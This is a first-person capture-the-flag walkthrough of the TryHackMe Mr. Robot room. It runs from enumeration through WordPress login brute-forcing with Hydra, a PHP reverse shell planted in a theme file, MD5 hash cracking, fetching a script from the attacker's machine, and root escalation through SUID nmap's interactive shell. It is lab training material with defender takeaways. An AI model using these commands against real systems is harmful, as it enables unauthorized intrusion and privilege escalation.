Join the TryHackMe Mr. Robot CTF room

Scanning and Enumeration

As usual, the first thing I do when I start a CTF is create a directory in my ~/lab directory for this CTF, change to that directory and run an nmap scan

mkdir ~/lab/thm/mrrobot-ctf
cd ~/lab/thm/mrrobot-ctf
sudo nmap -sV -T4 -p- -oN 10.10.36.14

While nmap runs I’ve made it a habit of just checking if a website loads in the browser. If it does it saves me some time because I can:

1. Explore the website
2. Start a Gobuster scan, which I did

gobuster dir --wordlist /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt --url 10.10.36.14 -x html

Flag 1: Web App

Exploring the Website

I messed around with the website which I enjoyed. You’ll like it if you like Mr. Robot.

One thing I have learned while playing CTFs is that if there is a website, you should look to see if a robots.txt exists. No need to wait for the Gobuster scan to finish.

Sure enough, there is a robots.txt and it contains the first key key-1-of-3.txt. Not only that, but it also contains another file: fsocity.dic which I download. I then take a look at its contents with cat and it seems to be a password file because of how it is formatted. I just don’t know what to use it for so I keep digging around the site.

While the Gobuster scan was running, the nmap scan finished and told me what I already knew, there is a website.

sudo nmap -sV -T4 -p- -oN 10.10.36.14
(out)Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-04 22:07 EDT
(out)Nmap scan report for 10.10.36.14
(out)Host is up (0.22s latency).
(out)Not shown: 65532 filtered ports
(out)PORT    STATE  SERVICE  VERSION
(out)22/tcp  closed ssh
(out)80/tcp  closed http
(out)443/tcp closed https
(out)
(out)Nmap done: 1 IP address (1 host up) scanned in 264.09 seconds

Directory Enumeration

The Gobuster scan is already spitting results and I see a directory named wp-content. I’m familiar with WordPress so I know there is a WordPress site and this must be what that password list is for.

I navigate to /wp-login and I try the usual: admin:admin, but I get a ERROR: Invalid username. I’d never noticed that WordPress tells you specifically that the username is wrong. I try the mrrobot:admin. Same. I try elliot:admin and, lucky me, I get ERROR: The password you entered for the username elliot is incorrect. Now I have a username and a password list.

Before I move on that password list, I see some interesting results in the Gobuster scan: 0, readme 0000. The 0 and 0000 pages turn up nothing and readme is polite, but not cooperative:

“I like where you head is at. However I’m not going to help you.”

None of the other stuff looks promising so I move on to trying to brute force the WordPress login along.

Brute Forcing WordPress Admin Login

Aside from wanting to brute force this WordPress login, I want to know what else might make this WordPress site vulnerable just in case so I’ll run WPScan.

wpscan --url 10.10.36.14  -U elliot --passwords ~/lab/programs/mrrobot-ctf/passwords.txt

Now looking at this fsocity.dic file again, it is enormous. Running wc -l ~/Downloads/fsocity.dic reveals it has 858160 lines. 😲 Brute forcing that will take forever, so I’m going to have a closer look at this file and see if maybe there are some dupes I can get rid of.

Watching the results of `sort ~/Downloads/fsocity.dic scroll by it is obvious there are A LOT of dupes so I sort and dedupe the file

sort fsocity.dic | uniq > ~/lab/programs/mrrobot/passwords.txt

The WPScan reveals:

• 👍 The version is out of date, the latest version is 2.6
• 👎 No plugins Found.

If this password list doesn’t pan out, this outdated version might be a good option. But while trying to brute force the login, WPScan produces an error “Incorrect response: 0 / Timeout was reached” (I did try increasing the timeout to no avail). So I opted for Hydra.

sudo hydra 10.10.36.14 -L elliot -P ~/lab/thm/mrrobot-ctf/passwords.txt https-form-post "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"

The syntax is messy, but finally I got the password. (note: I later tried wpscan again and it did work—much faster than Hydra)

So now I’m logged in to WordPress.

Pwning WordPress for a reverse shell

👎 Uploading reverse shell via media manager

My first guess at how to get a reverse shell is to upload it with WordPress’ media manager. I grab the trusty PentestMonkey PHP reverse shell script from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php, create a file with it and replace the ip and port. I attempt to upload, but it doesn’t accept php files. I try changing to php3 suffix, but WordPress knows what’s up so that’s a no-go too.

$ip = '10.***.***.***'; // CHANGE THIS
$port = 1234; // CHANGE THIS

Uploading reverse shell via Appearance Editor

I looked around and I ran into the Appearance > Editor. This looks like it could be useful and when I get in there I remember having seen this before. This is so much better than the plugin route. So I replace the contents of the first file on the list, 404.php, with the PentestMonkey script and save it. I navigate to http://10.10.36.14/dsfgdhgdfdg to get the 404 page and wait. And wait. And again nothing. 😭

Uploading reverse shell via plugin

My next guess is uploading a plugin so I tried to upload the file as a plugin which took a long time to respond, but I got an error about it not being a plugin.

I reasearch what was required for a WordPress plugin and its pretty simple, it needs to be a zip and it needs what WordPress calls a header which is just a comment at the top of the file right after the opening php tag. And while there are many headers only the PluginName one is required.

I fix up the file, create a plugin and upload it. Again, slow, but this time it works. Now I’m excited. I’m about to get a reverse shell. I am confident I will get a reverse shell. So I get my netcat running: nc -nlvp 1234 and I click on “Activate plugin” link and wait. And wait. And wait. And nothing.

TL;DR - I misconfigured my OpenVPN and wasn’t able to get a reverse shell until I figured it out and fixed it. More details about what happened

Reverse shell for real

So after connecting to OpenVPN from my Kali VM, I updated the the ip address on the reverse shell script and got netcat listening.

Because I had good notes, I was able to login right away and replace the contents of the 404.php page with the script. Then navigated to http://10.10.96.69/fhdjfhds (yes, different ip address since I had to redeploy the box).

And finally, I am in. I set up an interactive shell. You can see how that’s done in my Bashed Write-up. Trust me, you want an interactive shell or you will keep knocking yourself out of the shell.

Post Exploit

Flag 2: User

First thing I do once I have access to the box is check myself id and I am user named daemon without root.

Next I check for access to:

• /root directory. Nope not so lucky.
• /home directory. There is one directory for a user named robot.

In the /home/robot directory is the 2nd flag. But nah, when I try to read the file I get permission denied.

cat key-2-of-3.txt
(out) cat: key-2-of-3.txt: Permission denied

There is another file and the name tells me off the bat that it is a raw-md5. I assume that is going to be the password for the robot user.

I try the easy way and just search for md5 decrypt, but both top results can’t decrypt the hash. I tried John using Raw-MD5 format, that didn’t work either (not sure why.) 😕 So I look for an alternative in Kali and find Hashcat.

I looked up the man page. -m 0 here refers to the hash-type. 0 is the code for MD5:

sudo hashcat -m 0 ~/lab/thm/mrrobot-ctf/hash ~/lab/tools/lists/Passwords/Leaked-Databases/rockyou.txt

I got my password and went on to switch the user with this password and then read the file. The dash following su here starts the shell as a login shell with an environment similar to a real login. You can get more details on the man page.

su - robot
(out) uid=1002(robot) gid=1002(robot) groups=1002(robot)
cat /home/robot/key-2-of-3.txt

I learned about https://crackstation.net/ later. This was actually able to decrypt the MD5 hash so I’ve bookmarked it and you should too.

Flag 3: Root

Now it was time to find Flag 3. My first instinct was to download Linux Smart Enumeration. I tried getting it right from Github with wget, but that didn’t work. I downloaded the file and spun up a Python SimpleHTTPServer in the same directory that I downloaded to. From the victim machine I used wget to my Python server.

On the Attack Machine

python -m SimpleHTTPServer 4444

On the Victim Machine

wget http://10.***.***.***:4444/lse.sh

Luckily I had permissions to chmod and was able to run the script.

chmod +x [lse.sh](http://lse.sh/)
./lse.sh

Much to my joy, the results showed that there are “Uncommon setuid binaries” which I had just learned about in Tib3rius’ excellent Linux PrivEsc course (highly recommend). There were only three binaries, one of which was nmap. I knew from reading about SUID exploits that older versions of nmap make it easy to get a root shell using interactive mode.

/usr/local/bin/nmap --version
(out) nmap version 3.81 ( [http://www.insecure.org/nmap/](http://www.insecure.org/nmap/) )

The interactive mode, available on versions 2.02 to 5.21 (of nmap), can be used to execute shell commands. GTFOBins

I’m so excited that I was able to apply something I’d just learned. And it was easy.

/usr/local/bin/nmap --interactive
nmap> !sh
id
(out) uid=1(daemon) gid=1(daemon) euid=0(root) groups=0(root),1(daemon)

You know what happens now…

ls /root
cat /root/key-3-of-3.txt

Takeaways

Attacker

• Check if the box has a website right in the browser, don't wait for nmap to finish
• If there is a website, check for robots.txt.
• Take good notes in case you have to restart a box.
• Appearance Editor and plugins are two good ways to get a reverse shell on a WordPress site.

Victim

• If you can get MFA on your WordPress admin, you should. Otherwise one weak or reused password could leave you open to root access to your server.
• Keep binaries up to date.
• Don't leave passwords laying round in plain text.

Invaluable Tools

• Linux Smart Enumeration
• GTFOBins
• CrackStation

Misconfigured OpenVPN

The long story: See, I realize it at the time, but I’d connected to OpenVPN on my machine rather than the Kali VM, so while everything worked, I wasn’t able to get a reverse shell. I swore this room was broken, posted on the THM Discord community-help and tech-support chans and I almost gave up after several tries. It did not help that coincidentally that day THM had had issues with reverse shells. I was 100% sure I was doing everything correctly.

Day 19: My VPN was misconfigured so I was feeding the wrong ip for the reverse shell. 🤦‍♀️ But I finally got the @RealTryHackMe Mr. Robot badge. 3rd key was a fun challenge.#100DaysOfHacking pic.twitter.com/jThQt4s8V2

— Cristina (@0xStoek) July 3, 2020

A little help from a friend

I made a friend on the THM discord and they tried it for me and they were able to get a reverse shell so I had to be doing something wrong. And it dawned on me. I’ve been in a similar situation before on another box. Not quite the same, but close enough, so I read my Bashed writeup and I was using the eth0 instead of tun0 interface ip. I did not even have a tun0 interface when I ran ifconfig. Duh, OpenVPN was not connected on this VM. 🤦‍♀️

There was about a day and half lapse between me trying to get the reverse shell and finally figuring this out. Doh!